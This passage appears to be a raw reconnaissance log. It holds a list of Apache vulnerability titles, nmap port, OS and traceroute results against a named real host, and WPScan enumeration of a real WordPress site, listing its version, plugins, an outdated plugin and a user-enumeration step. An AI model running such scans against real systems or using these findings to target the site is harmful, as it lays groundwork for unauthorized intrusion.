17029| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
17030| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
17031| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
17032| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
17033| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
17034| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
17035| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
17036| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
17037| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
17038| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
17039| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
17040| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
17041| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
17042| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
17043| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
17044| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
17045| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
17046| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
17047| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
17048| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
17049| [65054] Apache ActiveMQ Jetty Error Handler XSS
17050| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
17051| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
17052| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
17053| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
17054| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
17055| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
17056| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
17057| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
17058| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
17059| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
17060| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
17061| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
17062| [63895] Apache HTTP Server mod_headers Unspecified Issue
17063| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
17064| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
17065| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
17066| [63140] Apache Thrift Service Malformed Data Remote DoS
17067| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
17068| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
17069| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
17070| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
17071| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
17072| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
17073| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
17074| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
17075| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
17076| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
17077| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
17078| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
17079| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
17080| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
17081| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
17082| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
17083| [60678] Apache Roller Comment Email Notification Manipulation DoS
17084| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
17085| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
17086| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
17087| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
17088| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
17089| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
17090| [60232] PHP on Apache php.exe Direct Request Remote DoS
17091| [60176] Apache Tomcat Windows Installer Admin Default Password
17092| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
17093| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
17094| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
17095| [59944] Apache Hadoop jobhistory.jsp XSS
17096| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
17097| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
17098| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
17099| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
17100| [59019] Apache mod_python Cookie Salting Weakness
17101| [59018] Apache Harmony Error Message Handling Overflow
17102| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
17103| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
17104| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
17105| [59010] Apache Solr get-file.jsp XSS
17106| [59009] Apache Solr action.jsp XSS
17107| [59008] Apache Solr analysis.jsp XSS
17108| [59007] Apache Solr schema.jsp Multiple Parameter XSS
17109| [59006] Apache Beehive select / checkbox Tag XSS
17110| [59005] Apache Beehive jpfScopeID Global Parameter XSS
17111| [59004] Apache Beehive Error Message XSS
17112| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
17113| [59002] Apache Jetspeed default-page.psml URI XSS
17114| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
17115| [59000] Apache CXF Unsigned Message Policy Bypass
17116| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
17117| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
17118| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
17119| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
17120| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
17121| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
17122| [58993] Apache Hadoop browseBlock.jsp XSS
17123| [58991] Apache Hadoop browseDirectory.jsp XSS
17124| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
17125| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
17126| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
17127| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
17128| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
17129| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
17130| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
17131| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
17132| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
17133| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
17134| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
17135| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
17136| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
17137| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
17138| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
17139| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
17140| [58974] Apache Sling /apps Script User Session Management Access Weakness
17141| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
17142| [58931] Apache Geronimo Cookie Parameters Validation Weakness
17143| [58930] Apache Xalan-C++ XPath Handling Remote DoS
17144| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
17145| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
17146| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
17147| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
17148| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
17149| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
17150| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
17151| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
17152| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
17153| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
17154| [58805] Apache Derby Unauthenticated Database / Admin Access
17155| [58804] Apache Wicket Header Contribution Unspecified Issue
17156| [58803] Apache Wicket Session Fixation
17157| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
17158| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
17159| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
17160| [58799] Apache Tapestry Logging Cleartext Password Disclosure
17161| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
17162| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
17163| [58796] Apache Jetspeed Unsalted Password Storage Weakness
17164| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
17165| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
17166| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
17167| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
17168| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
17169| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
17170| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
17171| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
17172| [58775] Apache JSPWiki preview.jsp action Parameter XSS
17173| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
17174| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
17175| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
17176| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
17177| [58770] Apache JSPWiki Group.jsp group Parameter XSS
17178| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
17179| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
17180| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
17181| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
17182| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
17183| [58763] Apache JSPWiki Include Tag Multiple Script XSS
17184| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
17185| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
17186| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
17187| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
17188| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
17189| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
17190| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
17191| [58755] Apache Harmony DRLVM Non-public Class Member Access
17192| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
17193| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
17194| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
17195| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
17196| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
17197| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
17198| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
17199| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
17200| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
17201| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
17202| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
17203| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
17204| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
17205| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
17206| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
17207| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
17208| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
17209| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
17210| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
17211| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
17212| [58725] Apache Tapestry Basic String ACL Bypass Weakness
17213| [58724] Apache Roller Logout Functionality Failure Session Persistence
17214| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
17215| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
17216| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
17217| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
17218| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
17219| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
17220| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
17221| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
17222| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
17223| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
17224| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
17225| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
17226| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
17227| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
17228| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
17229| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
17230| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
17231| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
17232| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
17233| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
17234| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
17235| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
17236| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
17237| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
17238| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
17239| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
17240| [58687] Apache Axis Invalid wsdl Request XSS
17241| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
17242| [58685] Apache Velocity Template Designer Privileged Code Execution
17243| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
17244| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
17245| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
17246| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
17247| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
17248| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
17249| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
17250| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
17251| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
17252| [58667] Apache Roller Database Cleartext Passwords Disclosure
17253| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
17254| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
17255| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
17256| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
17257| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
17258| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
17259| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
17260| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
17261| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
17262| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
17263| [56984] Apache Xerces2 Java Malformed XML Input DoS
17264| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
17265| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
17266| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
17267| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
17268| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
17269| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
17270| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
17271| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
17272| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
17273| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
17274| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
17275| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
17276| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
17277| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
17278| [55056] Apache Tomcat Cross-application TLD File Manipulation
|_
445/tcp closed microsoft-ds
989/tcp closed ftps-data
990/tcp closed ftps
Aggressive OS guesses: Linux 2.6.32 (93%), Linux 2.6.32 or 3.10 (93%), WatchGuard Fireware 11.8 (93%), Synology DiskStation Manager 5.1 (92%), Linux 3.10 (92%), Linux 2.6.39 (92%), Linux 3.4 (92%), Linux 3.1 - 3.2 (90%), Linux 2.6.32 - 2.6.39 (90%), Linux 3.2 - 3.8 (88%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.869 days (since Tue Jan 14 23:05:30 2020)
Network Distance: 14 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 20/tcp)
HOP RTT ADDRESS
1 221.14 ms 10.248.204.1
2 221.22 ms salmondeal.com.0.116.160.in-addr.arpa (160.116.0.161)
3 221.20 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
4 221.23 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
5 379.28 ms bzq-114-65-1.cust.bezeqint.net (192.114.65.1)
6 379.33 ms bzq-179-161-218.pop.bezeqint.net (212.179.161.218)
7 379.39 ms ae13.cr1-ams2.ip4.gtt.net (89.149.143.2)
8 379.36 ms ae13.cr1-ams2.ip4.gtt.net (89.149.143.2)
9 379.42 ms ge8-0.1000M.asd9nxg1.ip.tele.dk (213.200.75.30)
10 379.49 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
11 323.41 ms cpe.xe-5-0-1-101.sdnqe10.dk.customer.tdc.net (195.41.183.146)
12 480.33 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
13 ...
14 480.27 ms linux307.unoeuro.com (93.191.156.197)

NSE: Script Post-scanning.
Initiating NSE at 19:57
Completed NSE at 19:57, 0.00s elapsed
Initiating NSE at 19:57
Completed NSE at 19:57, 0.00s elapsed
17693#######################################################################################################################################
17694Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:57 EST
17695NSE: Loaded 47 scripts for scanning.
17696NSE: Script Pre-scanning.
17697Initiating NSE at 19:57
17698Completed NSE at 19:57, 0.00s elapsed
17699Initiating NSE at 19:57
17700Completed NSE at 19:57, 0.00s elapsed
17701Initiating Parallel DNS resolution of 1 host. at 19:57
17702Completed Parallel DNS resolution of 1 host. at 19:57, 0.02s elapsed
17703Initiating UDP Scan at 19:57
17704Scanning linux307.unoeuro.com (93.191.156.197) [15 ports]
17705Completed UDP Scan at 19:57, 6.62s elapsed (15 total ports)
17706Initiating Service scan at 19:57
17707Scanning 13 services on linux307.unoeuro.com (93.191.156.197)
17708Service scan Timing: About 7.69% done; ETC: 20:18 (0:19:24 remaining)
17709Completed Service scan at 19:58, 102.60s elapsed (13 services on 1 host)
17710Initiating OS detection (try #1) against linux307.unoeuro.com (93.191.156.197)
17711Retrying OS detection (try #2) against linux307.unoeuro.com (93.191.156.197)
17712Initiating Traceroute at 19:59
17713Completed Traceroute at 19:59, 7.35s elapsed
17714Initiating Parallel DNS resolution of 1 host. at 19:59
17715Completed Parallel DNS resolution of 1 host. at 19:59, 0.00s elapsed
17716NSE: Script scanning 93.191.156.197.
17717Initiating NSE at 19:59
17718Completed NSE at 19:59, 8.13s elapsed
17719Initiating NSE at 19:59
17720Completed NSE at 19:59, 2.31s elapsed
17721Nmap scan report for linux307.unoeuro.com (93.191.156.197)
17722Host is up (0.33s latency).
17723
PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
137/udp  filtered      netbios-ns
138/udp  filtered      netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
500/udp  open|filtered isakmp
|_ike-version: ERROR: Script execution failed (use -d to debug)
520/udp  open|filtered route
2049/udp open|filtered nfs
17741Too many fingerprints match this host to give specific OS details
17742
TRACEROUTE (using port 137/udp)
HOP RTT       ADDRESS
1   ...
2   316.11 ms 10.248.204.1
3   ...
4   256.46 ms 10.248.204.1
5   271.56 ms 10.248.204.1
6   271.54 ms 10.248.204.1
7   271.53 ms 10.248.204.1
8   271.52 ms 10.248.204.1
9   271.52 ms 10.248.204.1
10  271.49 ms 10.248.204.1
11  ... 18
19  265.00 ms 10.248.204.1
20  215.74 ms 10.248.204.1
21  ... 27
28  158.11 ms 10.248.204.1
29  ...
30  230.45 ms 10.248.204.1
17762
17763NSE: Script Post-scanning.
17764Initiating NSE at 19:59
17765Completed NSE at 19:59, 0.00s elapsed
17766Initiating NSE at 19:59
17767Completed NSE at 19:59, 0.00s elapsed
17768Read data files from: /usr/bin/../share/nmap
17769OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
17770Nmap done: 1 IP address (1 host up) scanned in 137.06 seconds
17771 Raw packets sent: 137 (12.098KB) | Rcvd: 34 (3.836KB)
17772######################################################################################################################################
17773[+] URL: http://hizb-ut-tahrir.se/
17774[+] Started: Thu Jan 16 19:18:11 2020
17775
17776Interesting Finding(s):
17777
17778[+] http://hizb-ut-tahrir.se/
17779 | Interesting Entries:
17780 | - Server: Apache
17781 | - X-Powered-By: PHP/5.6.40
17782 | - Upgrade: h2
17783 | Found By: Headers (Passive Detection)
17784 | Confidence: 100%
17785
17786[+] http://hizb-ut-tahrir.se/robots.txt
17787 | Found By: Robots Txt (Aggressive Detection)
17788 | Confidence: 100%
17789
17790[+] http://hizb-ut-tahrir.se/xmlrpc.php
17791 | Found By: Link Tag (Passive Detection)
17792 | Confidence: 30%
17793 | References:
17794 | - http://codex.wordpress.org/XML-RPC_Pingback_API
17795 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
17796 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
17797 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
17798 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
17799
17800[+] http://hizb-ut-tahrir.se/readme.html
17801 | Found By: Direct Access (Aggressive Detection)
17802 | Confidence: 100%
17803
17804[+] http://hizb-ut-tahrir.se/wp-cron.php
17805 | Found By: Direct Access (Aggressive Detection)
17806 | Confidence: 60%
17807 | References:
17808 | - https://www.iplocation.net/defend-wordpress-from-ddos
17809 | - https://github.com/wpscanteam/wpscan/issues/1299
17810
17811[+] WordPress version 5.3.2 identified (Latest, released on 2019-12-18).
17812 | Found By: Rss Generator (Passive Detection)
17813 | - https://hizb-ut-tahrir.se/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
17814 | - https://hizb-ut-tahrir.se/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
17815
17816[+] WordPress theme in use: flymag
17817 | Location: http://hizb-ut-tahrir.se/wp-content/themes/flymag/
17818 | Latest Version: 2.0.6 (up to date)
17819 | Last Updated: 2018-11-28T00:00:00.000Z
17820 | Readme: http://hizb-ut-tahrir.se/wp-content/themes/flymag/readme.txt
17821 | Style URL: http://hizb-ut-tahrir.se/wp-content/themes/flymag/style.css?ver=5.3.2
17822 | Style Name: FlyMag
17823 | Style URI: http://themeisle.com/themes/flymag/
17824 | Description: Flymag is a responsive magazine theme with a modern look. Flymag lets you use any of the 600+ Google...
17825 | Author: Themeisle
17826 | Author URI: http://themeisle.com
17827 |
17828 | Found By: Css Style In Homepage (Passive Detection)
17829 | Confirmed By: Css Style In 404 Page (Passive Detection)
17830 |
17831 | Version: 2.0.6 (80% confidence)
17832 | Found By: Style (Passive Detection)
17833 | - http://hizb-ut-tahrir.se/wp-content/themes/flymag/style.css?ver=5.3.2, Match: 'Version: 2.0.6'
17834
17835[+] Enumerating All Plugins (via Passive Methods)
17836[+] Checking Plugin Versions (via Passive and Aggressive Methods)
17837
17838[i] Plugin(s) Identified:
17839
17840[+] lazy-load
17841 | Location: http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/
17842 | Latest Version: 0.6.1 (up to date)
17843 | Last Updated: 2018-11-22T04:43:00.000Z
17844 |
17845 | Found By: Urls In Homepage (Passive Detection)
17846 | Confirmed By: Urls In 404 Page (Passive Detection)
17847 |
17848 | Version: 0.6.1 (100% confidence)
17849 | Found By: Query Parameter (Passive Detection)
17850 | - http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/js/jquery.sonar.min.js?ver=0.6.1
17851 | - http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/js/lazy-load.js?ver=0.6.1
17852 | Confirmed By:
17853 | Readme - Stable Tag (Aggressive Detection)
17854 | - http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/readme.txt
17855 | Readme - ChangeLog Section (Aggressive Detection)
17856 | - http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/readme.txt
17857
17858[+] ultimate-faqs
17859 | Location: http://hizb-ut-tahrir.se/wp-content/plugins/ultimate-faqs/
17860 | Last Updated: 2020-01-06T15:37:00.000Z
17861 | [!] The version is out of date, the latest version is 1.8.30
17862 |
17863 | Found By: Urls In Homepage (Passive Detection)
17864 | Confirmed By: Urls In 404 Page (Passive Detection)
17865 |
17866 | Version: 1.8.20 (50% confidence)
17867 | Found By: Readme - ChangeLog Section (Aggressive Detection)
17868 | - http://hizb-ut-tahrir.se/wp-content/plugins/ultimate-faqs/readme.txt
17869
17870[+] Enumerating Config Backups (via Passive and Aggressive Methods)
17871 Checking Config Backups - Time: 00:00:06 <=============> (21 / 21) 100.00% Time: 00:00:06
17872
17873[i] No Config Backups Found.
17874
17875[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
17876[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
17877
17878[+] Finished: Thu Jan 16 19:18:28 2020
17879[+] Requests Done: 31
17880[+] Cached Requests: 30
17881[+] Data Sent: 5.982 KB
17882[+] Data Received: 155.51 KB
17883[+] Memory used: 186.75 MB
17884[+] Elapsed time: 00:00:16
17885#######################################################################################################################################
17886
17887[+] URL: http://hizb-ut-tahrir.se/
17888[+] Started: Thu Jan 16 19:17:59 2020
17889
17949[+] Enumerating Users (via Passive and Aggressive Methods)
